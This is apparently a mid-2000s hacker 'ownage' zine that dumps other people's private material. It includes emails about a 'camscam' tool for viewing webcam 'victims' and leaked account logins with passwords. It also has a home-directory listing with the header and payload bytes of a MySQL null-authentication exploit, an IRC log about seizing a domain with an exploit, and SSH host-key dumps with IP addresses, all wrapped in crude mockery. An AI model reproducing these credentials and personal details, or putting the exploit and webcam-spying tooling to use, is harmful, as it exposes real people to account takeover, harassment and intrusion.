i used the CS beta2 and it have some errors to resolf some
screen-name…still good until now..:)) tell me if the perl2exe worked

—– Original Message —–
From: “Mourning Woode”
To:
Sent: Saturday, 10 May, 2003 05:36
Subject: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: camscam

> saves in bmp only i think, save favorites i think is button on lower
> right, verify file is written, i save copy after i close and rename
so
> i get new favs.txt every time. There are new versions in
development.
> I will give you beta2 it is different ( i personaly use beta2 ).
>
> perl2exe any or all versions, i just need to be real full versions,
so
> i can make special programs with no limits / warnings.
>
> On Mon, 9 Jun 2003 01:04:48 +0300 (darkangel@go.ro) wrote:
>
> >which version of perl2exe? for windows or Linux? the latest
perl2exe
> is v 7
> >and supports Perl 5.8.0, Perl 5.6.1, Perl 5.6.0 and Perl 5.005 . If
> that is
> >ok…just tell me and I upload on a site..u have right..the beta 3
> camscam
> >works on 20%-25% screen names. but it cannot save as jpg..the save
> button is
> >open button and it not save it. the favorites save as Username not
> screen
> >name and it can’t be delete /modify. If I close the camscam the
> favorites
> >are deleted too…sometimes in name resolv when I paste the screen
> name
> >appear “error” not the ip and the port…until now :)btw..May I
help
> u to
> >test or something ?
> >
> >—– Original Message —–
> >From: “Mourning Woode”
> >To:
> >Sent: Friday, 09 May, 2003 21:08
> >Subject: Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: camscam
> >
> >
> >> certainly it is not a 8080 issue. The fuzzy and grey is from
girls
> >> using 96e. I maintain a list of older 96d version usersthat are
> still
> >> clear. My suggestion is do collect many screen names and try
every
> >> one, making favorites as you go for clear ones. I cureently have
2
> >> people working on new 96e compatable versions… DONATIONS ARE
> >> ACCECPTED :) btw.. I am looking for full version of PERL2EXE or
> >> similar…
> >>
> >>
> >> On Fri, 9 May 2003 09:54:51 +0300 (darkangel@go.ro) wrote:
> >>
> >> >i downloaded it…but when i try to connect to any person which
> have
> >> the
> >> >port 8080 appears connecting… and then disapear and don’t
> work..but
> >> if the
> >> >victim has port 8081 it work but the quality is not good…i’ve
> >> attached a
> >> >copy of connection to 8080 which i am not receiving the image
and
> >> oane of
> >> >port 8081 when i have image but the quality is poor…anyway
> >> thanks..do you
> >> >think that is a bug with the port 8080 or just because at job i
am
> >> unning
> >> >win98se?
> >> >dan

From: webmistress@ladieslinks.com
Subject: Account Approved
Date: Thu, 26 Dec 2002 09:32:30 -0800 (PST)
To: morningwood@thepub.co.za
Full Headers
Undecoded Letter
Your account has been approved for our top sites list.

You can begin sending hits to the list at any time.
Use the following URL for your links:

http://www.ladieslinks.com/in.php?id=mrwood

If you need to make changes to your account, or want
to see your statistics, use the following login info:

Login At: http://join.ladieslinks.com/accounts.php?login
Username: mrwood
Password: qazwsx

Make sure you write down your username and password!

If you have any questions contact webmistress@ladieslinks.com

Regards,
Donna & Cecil

PS: Another link that might interest you..

The Woman’s TGP:

http://www.womenstgp.com

-~-~-~

The rest iz too lame to show here. It is truely discusting how many
complete e-tardz email morning_wood and get his elitist responcez.
Those of you who’ve seen morning_wood at his numerious african con
attendencez and saw that morning_wood only has 1 hand to type with
will really laugh at his password in that last email. He likes to
pick passwords from one side of the keyboard, so he can easily type
it one handed, while using a foot to masterbate over a tag.

15.txt-~-~-~ cripy’s guide to becoming elite

cr1py 1z el1t3! d0nt fuckz w1f h1m 0r h3’ll ch4t y0ur 34r 0ff!
PHC turn3d 1nt0 a j0k3.. d0 th3y 3v3n h4ck 4nym0r3?

mafia@peach $ ls -al /usr/home/cripy
total 83816
drwxr-xr-x 14 cripy cripy 1536 Dec 7 10:02 .
drwxr-xr-x 16 root wheel 512 Mar 31 2004 ..
-rw——- 1 cripy cripy 6256 Jan 3 00:35 .bash_history
-rw-r–r– 1 cripy cripy 771 Feb 25 2004 .cshrc
drwxr-xr-x 5 cripy cripy 512 May 25 2004 .darkstar
-rw-r–r– 1 cripy cripy 6 Oct 25 17:03 .fakeid
drwxr-xr-x 8 cripy cripy 1024 Dec 16 07:02 .irc
-rw-r–r– 1 cripy cripy 1345 Mar 6 2004 .ircrc
-rw-r–r– 1 cripy cripy 255 Feb 25 2004 .login
-rw-r–r– 1 cripy cripy 165 Feb 25 2004 .login_conf
drwxrwxrwx 2 cripy cripy 512 Mar 25 2004 .lynx
-rw——- 1 cripy cripy 371 Feb 25 2004 .mail_aliases
-rw-r–r– 1 cripy cripy 331 Feb 25 2004 .mailrc
-rw——- 1 cripy cripy 3 Apr 1 2004 .mysql_history
-rw-r–r– 1 cripy cripy 1158 Aug 24 07:25 .profile
-rw——- 1 cripy cripy 276 Feb 25 2004 .rhosts
-rw-r–r– 1 cripy cripy 852 Feb 25 2004 .shrc
drwx—— 2 cripy cripy 512 Mar 29 2004 .ssh
-rw-r–r– 1 cripy cripy 2052 May 20 2004 DEA
-rw——- 1 cripy cripy 8367633 Jan 4 09:13 IRCLOG
drwx—— 2 cripy cripy 512 Jun 28 2004 Mail
-rw-r–r– 1 cripy cripy 1527 Mar 31 2004 Tcl_Eval.c
-rw-r–r– 1 cripy cripy 66 Jul 11 20:18 c
drwx—— 12 cripy cripy 512 Apr 30 2004 darkstar
-rw-r–r– 1 cripy cripy 31352456 May 21 2004 dea.tgz
-rw-r–r– 1 cripy cripy 2638 Sep 6 19:42 f
-rw-r–r– 1 cripy cripy 685912 Nov 4 07:53 ghostlogger.exe
-rw——- 1 cripy cripy 2758 Nov 29 18:24 mbox
drwxr-xr-x 3 cripy cripy 512 May 1 2003 openssh-3.6.1p2
drwxr-xr-x 3 cripy cripy 512 Sep 26 2003 openssh-3.7.1p2
drwxr-xr-x 3 cripy cripy 1024 Dec 3 18:29 public_html
-rw-r–r– 1 cripy cripy 0 May 21 2004 sara.tgz
drwxr-xr-x 2 cripy cripy 512 Jul 27 16:02 ssh
-rw-r–r– 1 cripy cripy 2283520 Jul 28 17:53 ssh.tgz
-rw-r–r– 1 cripy cripy 30167 Jul 29 17:42 ssh.tgz.1
drwxr-xr-x 2 cripy cripy 512 Mar 28 2004 sshf
-rw-r–r– 1 cripy cripy 23794 Mar 28 2004 sshf.tgz
-rw-r–r– 1 cripy cripy 22 Jun 1 2004 turtl
drwxr-xr-x 2 cripy cripy 512 Sep 6 20:38 vsql_
-rw-r–r– 1 cripy cripy 6 May 17 2004 ~.fakeid
mafia@peach $ ls -al /usr/home/cripy/ssh
total 4656
drwxr-xr-x 2 cripy cripy 512 Jul 27 16:02 .
drwxr-xr-x 14 cripy cripy 1536 Dec 7 10:02 ..
-rw-r–r– 1 cripy cripy 231370 Jul 27 22:29 bios.txt
-rwxr-xr-x 1 cripy cripy 85 Jul 12 11:10 go.sh
-rwxr-xr-x 1 cripy cripy 453972 Jul 12 11:09 ss
-rwxr-xr-x 1 cripy cripy 1365263 Jul 12 11:10 sshf
-rw-r–r– 1 cripy cripy 215999 Jul 28 16:29 uniq.txt
-rw-r–r– 1 cripy cripy 1609 Jul 28 16:36 vuln.txt
mafia@peach $ ls -al /usr/home/cripy/vsql_
total 88
drwxr-xr-x 2 cripy cripy 512 Sep 6 20:38 .
drwxr-xr-x 14 cripy cripy 1536 Dec 7 10:02 ..
-rw-r–r– 1 cripy cripy 237 Aug 25 14:06 Makefile
-rw-r–r– 1 cripy cripy 351 Aug 27 03:18 README
-rw-r–r– 1 cripy cripy 503 Aug 27 03:06 test.c
-rwxr-xr-x 1 cripy cripy 7806 Sep 6 20:37 vsql
-rw-r–r– 1 cripy cripy 4591 Aug 27 03:23 vsql.c
-rw-r–r– 1 cripy cripy 244 Aug 27 02:35 vsql.h
-rw-r–r– 1 cripy cripy 17064 Sep 6 20:37 vsql.o
mafia@peach $ head /usr/home/cripy/vsql_/vsql.c
/*
** vSQL – NULL Authentication exploit for MySQL
**
** -v0id
**
** The following payload is the exploitation payload taken from snort
**
** 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00 :……………
** 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …………….
** 00 00 00 00 72 6F 6F 74 00 14 00 00 00 00 00 00 ….root……..
mafia@peach $ ls -al /usr/home/cripy/public_html
total 13700
drwxr-xr-x 3 cripy cripy 1024 Dec 3 18:29 .
drwxr-xr-x 14 cripy cripy 1536 Dec 7 10:02 ..
-rw-r–r– 1 cripy cripy 790772 Jun 13 2004 000_0160.JPG
-rw-r–r– 1 cripy cripy 67014 Apr 29 2004 137385.jpg
-rw-r–r– 1 cripy cripy 75662 May 21 2004 DEA
-rw-r–r– 1 cripy cripy 1043548 Dec 3 18:26 PRINCE_OF_PERSIA1.PNG
-rw-r–r– 1 cripy cripy 11443 Mar 27 2004 b
-rw-r–r– 1 cripy cripy 87 Jul 12 08:00 blah.html
-rw-r–r– 1 cripy cripy 23 Jul 3 2004 blah.php
-rw-r–r– 1 cripy cripy 23 Jul 3 2004 blah.txt
-rw-r–r– 1 cripy cripy 66712 Apr 28 2004 blak.jpg
-rw-r–r– 1 cripy cripy 67100 Apr 28 2004 blakangel.jpg
-rw-r–r– 1 cripy cripy 122654 Sep 8 16:44 bush.jpg
-rw-r–r– 1 cripy cripy 68296 Apr 28 2004 c.jpg
-rw-r–r– 1 cripy cripy 956 Oct 6 06:38 cc
-rw-r–r– 1 cripy cripy 66378 Apr 28 2004 cripy.jpg
-rw-r–r– 1 cripy cripy 66473 Apr 28 2004 daz.jpg
-rw-r–r– 1 cripy cripy 268 Jun 12 2004 functions.js
-rw-r–r– 1 cripy cripy 2377 Mar 30 2004 half
-rw-r–r– 1 cripy cripy 453 Mar 7 2004 index.html
-rw-r–r– 1 cripy cripy 66655 Apr 28 2004 infrared.jpg
-rw-r–r– 1 cripy cripy 7425 Sep 17 00:21 jpegcompoc.zip
-rw-r–r– 1 cripy cripy 4317641 Jul 20 15:58 kimbo.wmv
-rw-r–r– 1 cripy cripy 11067 Apr 10 2004 noww2.jpg
-rw-r–r– 1 cripy cripy 1937 Aug 26 17:49 pub.gpg
-rw-r–r– 1 cripy cripy 2284 Mar 30 2004 rest
-rw-r–r– 1 cripy cripy 2673 Apr 28 2004 sandy
drwxr-xr-x 3 cripy cripy 512 Jun 12 2004 sedo
-rw-r–r– 1 cripy cripy 11760 May 18 2004 sini
-rw-r–r– 1 cripy cripy 3242 Jun 23 2004 steve.txt
-rw-r–r– 1 cripy cripy 10824 Mar 27 2004 sysadmins
-rw-r–r– 1 cripy cripy 10643 Apr 10 2004 tanktop.jpg
-rw-r–r– 1 cripy cripy 6629 Jun 12 2004 web.css
mafia@peach $ cat steve.txt
Mr. Dole:

My firm garners information anonymously so that it
will be admissable in court at a later time, without
prejudice. This is a common practice for plaintiffs
with internet law cases and whose potential defendants
are not located within the U.S.

The domain “cracker.com” is rightfully owned by the
original registrar who is domiciled in California,
U.S.

The fact that “cracker.com” was recently (June 16)
“hijacked” after several years of continuous and paid
registration elsewhere is proof of this. Network
Solutions, the previous registrar of “cracker.com” has
offered to submit an affidavit attesting to the
time-record of such ownership, and the date, time, and
IP path to the source of the admin-c DNS change
request.

My firm also has notarized evidence of use of this
domain and trademark by my client for a period of
years, and my client’s internet service provider
further will provide evidentiary notice upon request,
and technical documentation showing the internet path
routing of traffic for “cracker.com” for a lengthy
period. They are subject to subpoena.

In California, where the owner-of-record of this
trademarked domain name resides, such domain name is
considered to be property. See:

http://www.law.washington.edu/courses/neilson/B550A_2003/Documents/Kremen%20v%20Cohen.htm

for the legal precedence for this case, and your local
law library or attorney for typical processes used to
garner evidence of the involvement of the parties
participating in the theft.

Position of Comity Statement: You are hereby advised
that these e-mails constitute an attempt to resolve
this matter in a comitous fashion.

Your response to them is evidence that your intent is
to do so, by precedent, and you are so advised to
maintain similar dialogue which the court considers to
be “good faith” action.

Only you can decide if you wish to declare how you
came to obtain the Network Solutions username and
password which facilitated the DNS remapping on or
about 16 June 2004, and rectify the problem before it
escalates to formal legal action.

If it is your wish to try and benefit commercially by
selling this domain name, as you have done by
registering it for sale at an on-line brokerage, these
anonymous communications will be remanded to the
appropriate court of jurisprudence as testimonial
evidence.

I have apprised the “Sedo.de” brokerage of your
actions as well, and anticipate that they will enforce
the terms of agreement within German property law, as
you have agreed to abide by them.

While attorney-client rules prohibit me from offering
counsel to parties other than plaintiff, I can advise
potential defendants of common and typical legal costs
they will incur if found guilty of trademark theft.
Costs in Germany and the U.S. will fall somewhere
between USD$2500 / 2250 Euro, and can often reach
three times that for protracted cases.

I urge you to resolve this matter as previously
requested, or to have your legal counsel contact me at
this address. After confirming you have an
attorney-client relationship and counsel’s domain of
jurisprudence, I will then be able to reveal to him or
her the name of our firm and the nature of the legal
charges to be levied.

S. Jackson
Att’y.

* * *
mafia@peach $ cat chat
cripy: this motherfucker
cripy: booger
cripy: is going to have me
cripy: start hacking again
cripy: i swear to god
d0v33: hehe
d0v33: he has an 0day hookup?
cripy: no
cripy: he jacked
cripy: #infrared
cripy: he took it over
cripy: i swear
cripy: this kid doesnt know
d0v33: he did? you sure?
cripy: who hes fucking with
cripy: yes im fucking sure
cripy: because he originally ‘cracked’ hackers.com
cripy: but i transferred it etc.
d0v33: what’d he say? like why’d he say he did it?

cripy: and hes mad cuz i wont let him irc from @hackers.com
cripy: i told him ill give him a host
cripy: like i swear to god
cripy: let me get some 0day right now and i bet you booger never comes on irc again
d0v33: why won’t you let him irc from hackers.com
d0v33: ?

cripy: because jen
cripy: i worked hard
cripy: to become ‘known’ on irc
cripy: i deserve hackers.com
cripy: i have a real problem with just “ANY” kid looking leet
d0v33: uh
cripy: i swear
cripy: it sounds stupid
cripy: but for real
d0v33: he was the one that taught you how to get domains
d0v33: that’s kinda messed cripy.
cripy: heh no
cripy: he just gave me the exploit
cripy: so what
cripy: Jen i told him that if pharmacy.com makes money i was going to give him a thousand dollars
d0v33: so now you are trying to stay known with the exploit he gave you… and you are saying that he doesnt deserve it?
d0v33: now you have just assured yourself of never getting another exploit from him
d0v33: and he seems to be a good source
d0v33: and he’s generally nice
d0v33: over not letting him irc from hackers.com?
come on.
cripy: heh
cripy: the domain has nothin to do with it
cripy: its the point
d0v33: i dont see any point
d0v33: i see you being mean to a guy who was cool to you
d0v33: heh
cripy: yes
d0v33: ah well.
cripy: i admit what i did was wrong
d0v33: dont admit it to me
cripy: but now theres no going back
cripy: :)
d0v33: yes… there is.
cripy: no
cripy: he tried me
cripy: i dont give a fuck
cripy: what i did to you
cripy: you take my channel
cripy: and its war
d0v33: you have to have an army to have a war
cripy: :)
d0v33: you gave that shit up
d0v33: didn’t you?
cripy: yes
cripy: but
cripy: hes #1 target on my list
d0v33: don’t bring it to my channel
cripy: im not jen
d0v33: k
cripy: if i was like othe rkids
cripy: he would have been
cripy: banned
cripy: already
cripy: i solve my problems with packets
d0v33: honestly…. you know, it really is really hard to just be like…. hey brian, I think I got pissed off at the time and
I have cooled down now and thought about it. Thanks for giving me the exploit, you can irc from hackers.com…
d0v33: he really isn’t a bad guy
d0v33: i dunno dude…
cripy: i know he is
cripy: i told him i would give him a host
cripy: jen originally he wanted
cripy: a host for his box
cripy: and then right when he sees
cripy: me irc from
cripy: hackers.com
cripy: he wants an account right now
cripy: and i HATE shell whores
cripy: and he whores shells from everyone
cripy: hes nice yes
d0v33: very
cripy: but he doesnt deserve hackers.com
cripy: heh
d0v33: and doesnt forget his friends
d0v33: heh… you wouldnt even have this ability without him
d0v33: that’s why i think this is so wrong.
d0v33: he didn’t have to tell you how to do it
cripy: heh
d0v33: but you were his friend…
d0v33: ah well…
d0v33: none of my business…
d0v33: just dont bring it to sysadmins
d0v33: ;)
cripy: heh

cr1pyz gu1d3 t0 b31ng 3l1t3:
1. tr1ck b00g3r 1nt0 g1v1ng 0day
2. us3 0day t0 g3t hackers.com
3. IRC from hackers.com… alot
4. m4k3 fun 0f 3v3ryb0dy. m4k3 fun 0f b00g3r.
5. suck phc c0ck. m4yb3 m0rg4n w1ll t34ch h1m h0w t0 c0de.

th1s must w0rk, c4use l00k @ h1s 3lit3 infrared gr0up. ph33r3d fr0m
3th330p14 to m0z4mb1qu3 4nd 3v3rywh3r3 1nb3tw33n.

16.txt-~-~-~ doni038 has a bad day

This is bx’s butthugger. Another albanian takes our oh so spechial packets.

Welcome to 0x1FE!

You or someone else has used your email account
(doni038@hackermail.com) to register an account at 0x1FE.

To finish the registration process you should visit the following
link in the next 24 hours to activate your user account, otherwise
the information will be automaticaly deleted by the system and you
should apply again:

http://www.0x1fe.org/modules.php?name=Your_Account&op=activate&username=DoNi038&check_num=e15db443b55e2908c460ea4d9da22112

Following is the member information:

-Nickname: DoNi038
-Password: 3791059

To: doni038@hackermail.com
Cc:
Subject: SexSearch Member Sent Email
Date: Sat, 8 Jan 2005 07:31:00 -0500 (EST)
Return-Path: <19050108-60da62ddc1a4f71eb521401b5f919061-1@track.sexsearch.com>
Delivered-To: doni038@hackermail.com
Received: (qmail 23003 invoked by uid 0); 8 Jan 2005 12:31:03 -0000
X-Ob-Received: from unknown (192.168.9.181)by mta45-2.us4.outblaze.com; 8 Jan 2005 12:31:03 -0000
Received: from mailer2.sexsearch.com (mailer2.sexsearch.com [209.47.169.66])by spf-jail2.us4.outblaze.com (Postfix) with ESMTP id 5236C27AB8for ; Sat, 8 Jan 2005 12:31:01 +0000 (GMT)
Received: from localhost (armorattack.sexsearch.com [192.168.10.46])by mailer2.sexsearch.com (8.12.9/8.12.9) with ESMTP id j08CV0aT034552for ; Sat, 8 Jan 2005 07: 31:00 -0500 (EST)(envelope-from 19050108-60da62ddc1a4f71eb521401b5f919061-1@track.sexsearch.com)
Message-Id: <200501081231.j08CV0aT034552@mailer2.sexsearch.com>
Content-Type: multipart/alternative;boundary=”=_891d3b39bb56fc54ed7d6dfe8a520baa”
Mime-Version: 1.0

REPLY | REPLY ALL | FORWARD [As Attachment] Previous | Next | Delete | Done
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

HELLO doni038

KYkink
has sent you an email on: January 8, 2005.

Click here to view your SexSearch email messages

SexSearch ID: doni038
Password: 448398

Go to SexSearch Now

To view/adjust your mail settings click here

If you have any questions or comments regarding your membership, please contact us at:
support@sexsearch.com

From: vianez [Save Address] [Block Sender]
To: “Alba Hacker”
Cc:
Subject: Re: here is the bin list :)
Date: Thu, 7 Oct 2004 19:04:15 +0200
Return-Path:
Delivered-To: doni038@hackermail.com
Received: (qmail 25749 invoked by uid 0); 7 Oct 2004 17:04:18 -0000
X-Ob-Received: from unknown (192.168.9.181)by mta45-1.us4.outblaze.com; 7 Oct 2004 17:04:18 -0000
Received: from mproxy.gmail.com (rproxy.gmail.com [64.233.170.193])by spf-jail2.us4.outblaze.com (Postfix) with ESMTP id 97B7827A18for ; Thu, 7 Oct 2004 16:56:10 +0000 (GMT)
Received: by mproxy.gmail.com with SMTP id 74so560334rnkfor ; Thu, 07 Oct 2004 10:04:17 -0700 (PDT)
Received: by 10.38.152.63 with SMTP id z63mr1836646rnd;Thu, 07 Oct 2004 10:04:16 -0700 (PDT)
Received: by 10.39.1.10 with HTTP; Thu, 7 Oct 2004 10:04:15 -0700 (PDT)
Message-Id: <9cdb268604100710047119d80b@mail.gmail.com>
Reply-To: vianez
In-Reply-To: <20041007165345.2BBC57A8C8A@ws4-4.us4.outblaze.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary=”—-=_Part_136_29852311.1097168655603″
References: <20041007165345.2BBC57A8C8A@ws4-4.us4.outblaze.com>

REPLY | REPLY ALL | FORWARD [As Attachment] Previous | Next | Delete | Done

————————————————– ——————————
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

ssdd.pl ikonboard exploit

————————————————– ——————————
Content-Type: application/octet-stream; name=ssdd.pl
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=ssdd.pl

ssdd.pl

From: albogenius@yahoo.com [Save Address] [Block Sender]
To: doni038@hackermail.com
Cc:
Subject: Welcome to Ultimate Albanian Security Web Forums
Date: Wed, 8 Sep 2004 19:06:01 -0400
Return-Path:
Delivered-To: doni038@hackermail.com
Received: (qmail 17861 invoked by uid 0); 8 Sep 2004 23:06:16 -0000
X-Ob-Received: from unknown (192.168.9.177)by mta45-1.us4.outblaze.com; 8 Sep 2004 23:06:16 -0000
Received: from q0.netfirms.com (q0.netfirms.com [204.92.123.98])by spf-jail1.us4.outblaze.com (Postfix) with SMTP id 483F933Bfor ; Wed, 8 Sep 2004 23:03:08 +0000 (GMT)
Received: (qmail 23964 invoked from network); 8 Sep 2004 23:06:00 -0000
Received: from unknown (10.8.9.0)by 0 with QMQP; 8 Sep 2004 23:06:00 -0000
Received: from m6.netfirms.com (209.171.43.54)by 0 with SMTP; 8 Sep 2004 23:06:00 -0000
Received: (qmail 52165 invoked from network); 8 Sep 2004 23:06:01 -0000
Received: from unknown (192.168.60.3)by m6.netfirms.com with QMQP; 8 Sep 2004 23:06:01 -0000
X-Ip: 151.205.196.132
m,66.6.220.21 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsdOyfMYQSBsm/7u3KbLmZSet/bWDmAcDY1E7dDSwLYGJ2VfyX4XNDMbZtFUMJzzNL6iKKbZ8hQd7ac8o2gwt5QVmMoYvwLnVkltwiICKYWTy/VhsxdOkHbZy1y7ZZdm/sFJM5I5GXTX+/OfVesnY3dlXewUoJj5C66r+3iI2Zs8=
216.32.70.26 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA5syvvBzCW9s3Rl8jjyT/vKB6Ne2bbEqbE3CeDgwTN+6QjclZSR2h7e5AgKcqIkQP0v6eoTft4DI3trJei0TyiIkjfJp/UA4/c/2i6iq4u/DHvgJJJucZby0R8zScJKIf2GLaTvWrTrXG8l0kPDxjIM7hvAk+8L9JCGBpAMSoLV0=
216.32.66.50 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxcd75+lwVznJ1SlISfKgcyjGkJcxTI2luXltyBsEo/l+HwjHj17+lBS5vh8GOf8MS34UW4Y3YNYuiZUOWu+37zDNfn52+XSHqlso0BL+w8OFd5vXyd8gC1x48zr6Ayd4etF4z/95Z/aOB3g1Pd+e3AlZSyBX2CY2of278Ih7DsE=
216.32.70.146 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2O9RH9TPEvtQvEN1lvC89UhOpJN4NJEFfSUh1NMOL44bg0doPrPIkklVMc7SpH4i+UubqpB23Si4VLXAqOFgFt8wBy2awXtWP1HZf9Coq3z4lRU8z1VvuaaoO2d2JiqNp4Is0guHxp8u4ij21c107HVMqJA/oqWzFTG5EquSsBs=
64.92.161.130 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAygVvtPyWBU2Sd0OO4DVHiGHn4lV1UBaOKrx855xSnVxHxNdzRCnncfP0PdGFXjRklJ/fnToS4jIspwnsZ+/Iz1ticyswkj+wApkQ4s46+nDewMMssKJYsh8+XBwS99bNIrF2kKKElJPVGzs8yh5kypCQzVh2Tvp6axnG70k1CqE=
admin.fast-solutions.net,66.252.8.35 ssh-dss AAAAB3NzaC1kc3MAAACBALQlNQxGdbiD30VTa93g4YEWBXkW8XsMA09LxZbXG2oWZ/EN8s8UP8cs5t6kB9rrfiSXXvAbItTvMoIrB2tQfvBJE0csNhwDPGjm16Eo3iZfHLqSKFZ3kdP+kls9wkkY0uP9F/+dwmUxmH592JjREJiQViOgaTljsw+Bt7AsvqanAAAAFQC0EYanD1/5R+s09wXb5lS4Sr8D2wAAAIEAjKxHYVpPjgsPYIVyU3TMlAkjvMAXq4rgmGv6kiJzg+68tLwCfyLWVqkLnuHGzEfmHW28xsvuc4STj2OZ3mIJ8hSQV8/q01AaHH6P6b5KJ98kFyRt97D/sGUzMGeZH6UCt1UDNwUB+DnB+3f8L+vpr05r/ZlFkYGKUMuSX6BbrykAAACBAK0Tkix59rBAHwi6Naz+NSNyRXQzoMzNXSZHUp32k8uuJSuGVWX+V+UT1yDvOf3bP0W/slLhaSJcJpobZRL6IeQinhIu5 +cz+1UEEydDrAXNXCgnUSKV7PwsS9hBq6rnjA6Ji4efrXP0ZgdDB1lsB0Fz7oJP5iE2kFT5b1bc/POy
195.49.140.5 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2go/6MQI+rWO0vlyi65blIweNrm6ywtRoT1DvoYRflq/E+IuypcAIz9XyNAxCRLhmi+BY7reS1RIw9z2S6W03NhTHuqbGU4XNPOQXSzBFpV/Xyjd7+jrthsix2Ml7JoDf6/HoAV/i81XHS+CHTiOpEDgStGV9nHWgdC8YH0DQ30=
viper.falcon-networks.com,66.6.220.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsdOyfMYQSBsm/7u3KbLmZSet/bWDmAcDY1E7dDSwLYGJ2VfyX4XNDMbZtFUMJzzNL6iKKbZ8hQd7ac8o2gwt5QVmMoYvwLnVkltwiICKYWTy/VhsxdOkHbZy1y7ZZdm/sFJM5I5GXTX+/OfVesnY3dlXewUoJj5C66r+3iI2Zs8=
67.19.176.186 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAp6xxbETODDDE/ZKWAT8T64NxKE3P75MGZ7/FQpAxGUGAAolAakRfEmWRpz0hZnxoW/IxlPHNLCQtUdYuVCFPojMODezOkB0ms9IHQn6Scy7DqB5EmDs82NgNcnNueUYaxns6yOmCYkWPJ2DPSrETgbBWDPAEpcJgMzFf3ovRKrk=
216.32.70.146 ssh-dss AAAAB3NzaC1kc3MAAACBANooV5z3UBbIwk2+XSSXPKqmX+hYUPZKHNL4FBxY+AfvDaqIp253Y9G+QIppgY7NGqRZkxwUx9Hy7mzYKWkHpaSb6R9krHp82CJDcpidNlr6CB4nhN48TkF1dmdhUTERMCUloa6J1T78Ansp8EYLY0LtkA5RFGXQDthiJHQXSweHAAAAFQD3DPtpCUneme9aNHlZTpAxCq02IQAAAIAfRLi5FYbGdTgjcRGdoKr2pdkID+o5GE6SFu2S59J6mE+kFd8NZ/GZepgHIXp666/Op05XGoBL6DdVihrUWKDrCXliPNcE3XltJPXY79pUWfI2dwinT50Mx48vYYNzi1HjGMawp83LRRnFKZmOiNTgPdJLTcCz575oY/r2vme5NQAAAIEAlDKUXoHHYQ8fjRAHr8ucE4MR99H0B4iy3JtuHfbJnTs+tTY9LSmRun8KvpHAn2856nAzYdIUJZjMjgQku/EFnDGaVdoy918j9glGyBDYL6s5W/e7zG1mFmDJ9h0kYxs23jzwUUk3stNG8FxCsepEyNeZ7Drmt945t/s7coGYwZQ=
216.32.81.82 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtLSZ9PpRoXlG2E53y1Xo+vjvNx5MyxPyAApoKJy7TD6wdJUIpx9zIL76W6uo1cizwZUG5Q7C3z4wgyWOhKZCAAaEyqdjWeP/Q0gd0+do++Qc6G3NL1ppFCP7emaQnDpBJNGw7L35LeKncvtQm9Tptvxfq+KvsGkX3XhGYqGJGos=
69.93.172.242 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAmwBqP4m/RyVqJDkWTsJ7S3cF1XHC9iM8cXlMKHn6DV+T50Fx5T9L6ommghDztrigcvJSbBPn1aW/9O9YO/s+i3w1cGU/2To7pA4hAEmxmLkZuQhu5G13BJFNrIxtNjlUhxaf70bM7qVmjYSQUefyHfN2rJuhqBDMpN1OtasSuOE=
69.50.181.110 ssh-dss AAAAB3NzaC1kc3MAAACBAMZTKaf1Onky2L1rTb6G4n3V0A/DwDGXTAOIijveCd9XtrEAMQKJa2ahQvxQOukHT1DMET4hj3E4fFdt3iTJa16wS5dVR1+hanQIdy6Mqv7DZV65eR0l7nkpPBN7GELfRVGxvt5x2uXXOR/L8wDrZb1mjraQwc/QgrRoSF9tQ4JxAAAAFQC2YV1Exq/KqEAkdInAtgdsH/w3vwAAAIEAp1SvVpscrJiSer5ekWsFbUS0vpgzB0oJV246Mv6yQo8LKBv7CoDcSFkB83KmIjj2WhHQ2v89cSdEIqgRcIc5+K9rWLhsAPOTXoZ46pQcJy3n7LPC3///Fuy5hrjDpxPjFVlGboDa5Cm1xYd/fzzUfeoprRdYj5LhOZ3+9swQg/UAAACAaQ1lKCzgxsg2SroxJ0jlYfRLHwBjOei7+3TJ5HzNCaSWH6p7MJxQHLhbohUFy3ni3rN3EfJCJavxTO++U8kzEby/SUtnNJnwNhbGQe8AIvzyR/7VJcai10gKNATTxc+WM13nn8uMlFoVGYKa8pwi/unycAXPK/HnlthjArUN66A=
69.50.181.189 ssh-dss AAAAB3NzaC1kc3MAAACBAIWMUNy9bIkluUuvUw8gf1Pzt5UxOWr9gZ4KhFkhb0pkNf7ayvcUmxKrwr1NC/58Pkc5ocaRPJhgXVCf32149MPqyQouUNVwhihOX/DtCRZamVOEqRW+OXmtY/TV6W6ulV3OpPqLPvp5CGhx3lFsaSjeGY5UgerwFEoaYqnTFfgXAAAAFQDUJgxvKmsoSdAb5KWpnVrZHZJCTwAAAIBrqaWL1Eb6r8hYnDXQliKd3Sw9kvowC/SDhJ+gGum1LGpAU1QzczqkC0hjJydkEvOxA7iG6AWwqITU5YHfMW47y3UfxwYSifKTVdqweInP9K7VJuhdc3xkMcYQ7hZVlZSYqGB3WbSMNTmgMDuD76Ly/h2uwH5tY5WtGftTXkyP7QAAAIBDPwasrIAMSum9hyzVfJYq3KN/kuDGbAu3lBRlGPnfYnj6PGdxbFrzU4QkYwclIvLO5/Rx/li+V3IAzHswX0oyDhlDLWJqEW0fmT/D3KoJX5Ll2WLwqZLo388jilsOYrHe4Du9Dv6y8wbA8mQU0/dFIOCM/9yr+EkbAg11VXo73Q==
